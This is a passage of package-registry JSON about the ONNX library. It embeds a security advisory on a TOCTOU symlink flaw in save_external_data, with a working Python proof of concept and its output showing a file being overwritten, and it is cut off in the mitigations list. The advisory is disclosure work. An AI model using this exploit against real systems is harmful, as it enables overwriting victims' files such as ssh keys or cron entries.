authors/andife"},{"login":"justinchuby","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/justinchuby"},{"login":"take-cheeze","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/take-cheeze"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fonnx%2Fonnx/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fonnx%2Fonnx/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fonnx%2Fonnx/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fonnx%2Fonnx/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fonnx%2Fonnx/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fonnx%2Fonnx/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2182423,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":2838910,"name":"onnx","ecosystem":"pypi","description":"Open Neural Network Exchange","homepage":"https://onnx.ai/","licenses":"Apache-2.0","normalized_licenses":["Apache-2.0"],"repository_url":"https://github.com/onnx/onnx","keywords_array":[],"namespace":null,"versions_count":51,"first_release_published_at":"2017-09-07T07:46:59.000Z","latest_release_published_at":"2026-06-15T12:48:59.000Z","latest_release_number":"1.22.0","last_synced_at":"2026-06-21T11:20:28.733Z","created_at":"2022-04-10T11:56:28.549Z","updated_at":"2026-06-21T11:20:28.734Z","registry_url":"https://pypi.org/project/onnx/","install_command":"pip install onnx --index-url https://pypi.org/simple","documentation_url":"https://onnx.readthedocs.io/","metadata":{"funding":null,"documentation":null,"classifiers":["Programming Language :: Python :: 3"],"normalized_name":"onnx","project_status":null},"repo_metadata":{"id":24890799,"uuid":"102692863","full_name":"onnx/onnx","owner":"onnx","description":"Open standard for machine learning interoperability","archived":false,"fork":false,"pushed_at":"2024-10-29T19:59:31.000Z","size":35154,"stargazers_count":17846,"open_issues_count":353,"forks_count":3670,"subscribers_count":437,"default_branch":"main","last_synced_at":"2024-10-29T20:10:31.600Z","etag":null,"topics":["deep-learning","deep-neural-networks","dnn","keras","machine-learning","ml","mxnet","neural-network","onnx","pytorch","scikit-learn","tensorflow"],"latest_commit_sha":null,"homepage":"https://onnx.ai/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/onnx.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2017-09-07T04:53:45.000Z","updated_at":"2024-10-29T17:45:37.000Z","dependencies_parsed_at":"2024-06-01T21:40:18.027Z","dependency_job_id":null,"html_url":"https://github.com/onnx/onnx","commit_stats":{"total_commits":2553,"total_committers":336,"mean_commits":7.598214285714286,"dds":0.8950254602428516,"last_synced_commit":"8a6b70f0adcff5409b8cd65883bbbea7d6c4f4e1"},"previous_names":[],"tags_count":30,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222121765,"owners_count":16934971,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"onnx","name":"Open Neural Network Exchange","uuid":"31675368","kind":"organization","description":"ONNX is an open ecosystem for interoperable AI models. It's a community project: we welcome your contributions!","email":null,"website":"https://onnx.ai","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/31675368?v=4","repositories_count":25,"last_synced_at":"2024-04-18T02:52:20.873Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/onnx","funding_links":[],"total_stars":37281,"followers":1377,"following":0,"created_at":"2022-11-02T16:24:54.756Z","updated_at":"2024-04-18T02:52:25.131Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx/repositories"},"tags":[{"name":"v1.16.1","sha":"595228d99e3977ac27cb79d5963adda262af99ad","kind":"commit","published_at":"2024-05-23T16:33:07.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.16.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"990217f043af7222348ca8f0301e17fa7b841781","kind":"commit","published_at":"2024-03-25T13:55:50.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.16.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.0/manifests"},{"name":"v1.15.0","sha":"b86cc54efce19530fb953e4b21f57e6b3888534c","kind":"commit","published_at":"2023-10-25T22:10:41.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.15.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.15.0/manifests"},{"name":"v1.14.1","sha":"1014f41f17ecc778d63e760a994579d96ba471ff","kind":"commit","published_at":"2023-08-24T22:20:34.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.14.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"a0d77f18516d2da7468a96b0de3b737266f23176","kind":"commit","published_at":"2023-05-04T00:14:24.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.14.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.0/manifests"},{"name":"v1.13.1","sha":"ad834eb73ee0cd9b6fa9ea892caeed5fa17d7dc0","kind":"commit","published_at":"2023-02-21T22:21:30.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.13.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"1ba785612a79fe749aa1e478336e534743372639","kind":"commit","published_at":"2022-12-09T18:56:29.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.13.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.0/manifests"},{"name":"v1.12.0","sha":"f7ee1ac60d06abe8e26c9b6bbe1e3db5286b614b","kind":"commit","published_at":"2022-06-17T23:32:07.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.12.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"96046b8ccfb8e6fa82f6b2b34b3d56add2e8849c","kind":"commit","published_at":"2022-02-16T23:56:21.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.11.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.11.0/manifests"},{"name":"v1.10.2","sha":"da889e6b95750350726d149bf447bf0cd1245964","kind":"commit","published_at":"2021-10-25T15:52:09.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.10.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1f63dcb7fcc3a8bf5c3c8e326867ecd6f5c43f35","kind":"commit","published_at":"2021-08-02T16:53:07.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.10.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"7c1e0b0391d06002789e56f8fe0c7bb9f4d1159b","kind":"commit","published_at":"2021-07-30T20:26:55.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.10.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.0/manifests"},{"name":"v1.9.0","sha":"1089b9e8045a3a2882d7bb6a1dbaeaf9cae131da","kind":"commit","published_at":"2021-04-19T09:51:42.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.9.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.9.0/manifests"},{"name":"v1.8.1","sha":"685898bc6f3fd6eb16ba129ea990f96330537e38","kind":"commit","published_at":"2021-01-29T23:23:52.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.8.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"994c6181247d7b419b28889fc57d5817e2089419","kind":"commit","published_at":"2020-11-06T05:01:27.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.8.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.0/manifests"},{"name":"v1.7.0","sha":"0c070abb0c40fec649f81a73a75b0098662ec486","kind":"commit","published_at":"2020-05-08T21:09:31.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.7.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"553df22c67bee5f0fe6599cff60f1afc6748c635","kind":"commit","published_at":"2019-09-25T20:35:26.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.6.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.6.0/manifests"},{"name":"v1.5.0","sha":"94d238d96e3fb3a7ba34f03c284b9ad3516163be","kind":"commit","published_at":"2019-04-24T05:05:06.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.5.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.5.0/manifests"},{"name":"v1.4.1","sha":"9e55ace55aad1ada27516038dfbdc66a8a0763db","kind":"commit","published_at":"2019-01-23T23:05:32.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.4.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"8a1319733a5518bd0001842db27e2df53a306eff","kind":"commit","published_at":"2019-01-23T01:49:13.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.4.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.0/manifests"},{"name":"v1.2.3","sha":"5af210ca8a1c73aa6bae8754c9346ec54d0a756e","kind":"commit","published_at":"2018-09-07T22:57:18.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.2.3","html_url":"https://github.com/onnx/onnx/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.3/manifests"},{"name":"v1.3.0","sha":"bae6333e149a59a3faa9c4d9c44974373dcf5256","kind":"commit","published_at":"2018-08-30T17:33:20.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.3.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.3.0/manifests"},{"name":"v1.2.2","sha":"3376d4438aaadfba483399fa249b841153152bc0","kind":"commit","published_at":"2018-06-18T18:43:47.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.2.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.2/manifests"},{"name":"v1.2.1","sha":"c7b60050ad6ae963bf2cc1d0eb3c32b07eb7eeed","kind":"commit","published_at":"2018-05-25T02:03:59.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.2.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.1/manifests"},{"name":"v1.1.2","sha":"2f85783fc43576b5e39b207f95d5f789641ae706","kind":"commit","published_at":"2018-04-25T23:02:26.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.1.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.2/manifests"},{"name":"v1.1.0","sha":"79dc46fa4d484981f75695a73f3d38d5717fc435","kind":"commit","published_at":"2018-03-10T06:34:57.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.1.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.0/manifests"},{"name":"v1.0.1","sha":"7633012b06b4caf0f829060668d06948c7f42e03","kind":"commit","published_at":"2018-01-26T02:25:37.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.0.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0.1/manifests"},{"name":"v1.0","sha":"5712a94fa8bd9cb4c99f2a5c05156576739f76f4","kind":"commit","published_at":"2017-12-04T21:39:16.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0/manifests"},{"name":"v0.2","sha":"63569b8a2e2ad4f56c5476954337a87cc4428862","kind":"commit","published_at":"2017-10-10T04:52:28.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v0.2","html_url":"https://github.com/onnx/onnx/releases/tag/v0.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.2/manifests"},{"name":"v0.1","sha":"bbe22f447a4f3c38642dc9ca7ba0e8dd1ebaef94","kind":"commit","published_at":"2017-09-07T07:56:59.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v0.1","html_url":"https://github.com/onnx/onnx/releases/tag/v0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.1/manifests"}]},"repo_metadata_updated_at":"2024-10-29T22:18:07.263Z","dependent_packages_count":483,"downloads":19984333,"downloads_period":"last-month","dependent_repos_count":8716,"rankings":{"downloads":0.1499042436770428,"dependent_repos_count":0.09404638861867705,"dependent_packages_count":0.05414792071984436,"stargazers_count":0.12729511186770429,"forks_count":0.10297604571984437,"docker_downloads_count":0.5882174124513618,"average":0.18609785384241243},"purl":"pkg:pypi/onnx","advisories":[{"uuid":"GSA_kwCzR0hTQS1xNTZ4LWcyZmotNHJqNs4ABUmQ","url":"https://github.com/advisories/GHSA-q56x-g2fj-4rj6","title":"ONNX: TOCTOU arbitrary file read/write in save_external_dat ","description":"### Summary\n\nThe `save_external_data` method seems to include multiple issues introducing a local TOCTOU vulnerability, an arbitrary file read/write on any system. It potentially includes a path validation bypass on Windows systems.\nRegarding the TOCTOU, an attacker seems to be able to overwrite victim's files via symlink following under the same privilege scope.\nThe mentioned function can be found here: https://github.com/onnx/onnx/blob/main/onnx/external_data_helper.py#L188\n\n### Details\n\n#### Toctou\nThe vulnerable code pattern:\n```python\n   # CHECK - Is this a file?\n   if not os.path.isfile(external_data_file_path):\n       # Line 228-229: USE #1 - Create if it doesn't exist\n       with open(external_data_file_path, \"ab\"):\n           pass\n   \n   # Open for writing\n   with open(external_data_file_path, \"r+b\") as data_file:\n       # Lines 233-243: Write tensor data\n       data_file.seek(0, 2)\n       if info.offset is not None:\n           file_size = data_file.tell()\n           if info.offset \u003e file_size:\n               data_file.write(b\"\\0\" * (info.offset - file_size))\n           data_file.seek(info.offset)\n       offset = data_file.tell()\n       data_file.write(tensor.raw_data)\n```\nThere is a time gap between `os.path.isfile` and `open` with no atomic file creation flags (e.g. `O_EXCEL | O_CREAT`) allowing the attacker to create a symlink that is being followed (absence of `O_NOFOLLOW`), between these two calls. By combining these, the attack is possible as shown below in the PoC section.\n\n#### Bypass\nThere is also a potential validation bypass on Windows systems in the same method (https://github.com/onnx/onnx/blob/main/onnx/external_data_helper.py#L203) allowing absolute paths like `C:\\` (only 1 part):\n```python\nif location_path.is_absolute() and len(location_path.parts) \u003e 1\n```\nThis may allow Windows Path Traversals (not 100% verified as I am emulating things on a Debian distro).\n\n### PoC\n\nInstall the dependencies and run this:\n```python\nimport os\nimport sys\nimport tempfile\nimport numpy as np\nimport onnx\nfrom onnx import TensorProto, helper\nfrom onnx.numpy_helper import from_array\n\n# Create a temporary directory for our poc\nwith tempfile.TemporaryDirectory() as tmpdir:\n    print(f\"[*] Working directory: {tmpdir}\")\n\n    # Create a \"sensitive\" file that we'll overwrite\n    sensitive_file = os.path.join(tmpdir, \"sensitive.txt\")\n    with open(sensitive_file, 'w') as f:\n        f.write(\"SENSITIVE DATA - DO NOT OVERWRITE\")\n\n    original_content = open(sensitive_file, 'rb').read()\n    print(f\"[*] Created sensitive file: {sensitive_file}\")\n    print(f\"    Original content: {original_content}\")\n\n    # Create a simple ONNX model with a large tensor\n    print(\"[*] Creating ONNX model with external data...\")\n\n    # Create a tensor with data \u003e 1KB (to trigger external data)\n    large_array = np.ones((100, 100), dtype=np.float32)  # 40KB tensor\n    large_tensor = from_array(large_array, name='large_weight')\n\n    # Create a minimal model\n    model = helper.make_model(\n        helper.make_graph(\n            [helper.make_node('Identity', ['input'], ['output'])],\n            'minimal_model',\n            [helper.make_tensor_value_info('input', TensorProto.FLOAT, [100, 100])],\n            [helper.make_tensor_value_info('output', TensorProto.FLOAT, [100, 100])],\n            [large_tensor]\n        )\n    )\n\n    # Save model with external data to create the external data file\n    model_path = os.path.join(tmpdir, \"model.onnx\")\n    external_data_name = \"data.bin\"\n    external_data_path = os.path.join(tmpdir, external_data_name)\n\n    onnx.save_model(\n        model, \n        model_path,\n        save_as_external_data=True,\n        all_tensors_to_one_file=True,\n        location=external_data_name,\n        size_threshold=1024\n    )\n\n    print(f\"[+] Model saved: {model_path}\")\n    print(f\"[+] External data created: {external_data_path}\")\n\n    # Now comes the attack: replace the external data file with a symlink\n    print(\"[!] ATTACK: Replacing external data file with symlink...\")\n\n    # Remove the legitimate external data file\n    if os.path.exists(external_data_path):\n        os.remove(external_data_path)\n        print(f\"    Removed: {external_data_path}\")\n\n    # Create symlink pointing to sensitive file\n    os.symlink(sensitive_file, external_data_path)\n    print(f\"    Created symlink: {external_data_path} -\u003e {sensitive_file}\")\n\n    # Now load and re-save the model, which will trigger the vulnerability\n    print(\"Loading model and saving with external data...\")\n    try:\n        # Load the model (without loading external data)\n        loaded_model = onnx.load(model_path, load_external_data=False)\n\n        # Modify the model slightly (to ensure we write new data)\n        loaded_model.graph.initializer[0].raw_data = large_array.tobytes()\n\n        # Save again - this will call save_external_data() and follow the symlink\n        onnx.save_model(\n            loaded_model,\n            model_path,\n            save_as_external_data=True,\n            all_tensors_to_one_file=True,\n            location=external_data_name,\n            size_threshold=1024\n        )\n    except Exception as e:\n        print(f\"[-] Error: {e}\")\n    \n    # Check if the sensitive file was overwritten\n    print(\"[*] Checking if sensitive file was modified...\")\n    modified_content = open(sensitive_file, 'rb').read()\n    \n    print(f\"    Original size: {len(original_content)} bytes\")\n    print(f\"    Current size:  {len(modified_content)} bytes\")\n    print(f\"    Original content: {original_content[:50]}\")\n    print(f\"    Current content:  {modified_content[:50]}...\")\n    print()\n    \n    if modified_content != original_content:\n        print(\"[!] Success!\")\n    else:\n        print(\"[-] Failure\")\n```\nOutput:\n```\n[*] Working directory: /tmp/tmpqy7z88_l\n[*] Created sensitive file: /tmp/tmpqy7z88_l/sensitive.txt\n    Original content: b'SENSITIVE DATA - DO NOT OVERWRITE'\n\n[*] Creating ONNX model with external data...\n[+] Model saved: /tmp/tmpqy7z88_l/model.onnx\n[+] External data created: /tmp/tmpqy7z88_l/data.bin\n[!] ATTACK: Replacing external data file with symlink...\n    Removed: /tmp/tmpqy7z88_l/data.bin\n    Created symlink: /tmp/tmpqy7z88_l/data.bin -\u003e /tmp/tmpqy7z88_l/sensitive.txt\nLoading model and saving with external data...\n[*] Checking if sensitive file was modified...\n    Original size: 33 bytes\n    Current size:  40033 bytes\n    Original content: b'SENSITIVE DATA - DO NOT OVERWRITE'\n    Current content:  b'SENSITIVE DATA - DO NOT OVERWRITE\\x00\\x00\\x80?\\x00\\x00\\x80?\\x00\\x00\\x80?\\x00\\x00\\x80?\\x00'...\n```\nSuccessfully overwritting the \"sensitive data\" file.\n\n### Impact\nThe impact may include filesystem injections (e.g. on ssh keys, shell configs, crons) or destruction of files, affecting integrity and availability.\n\n### Mitigations\n1. Atomic file creation\n2. Symlink protection\n3. Path 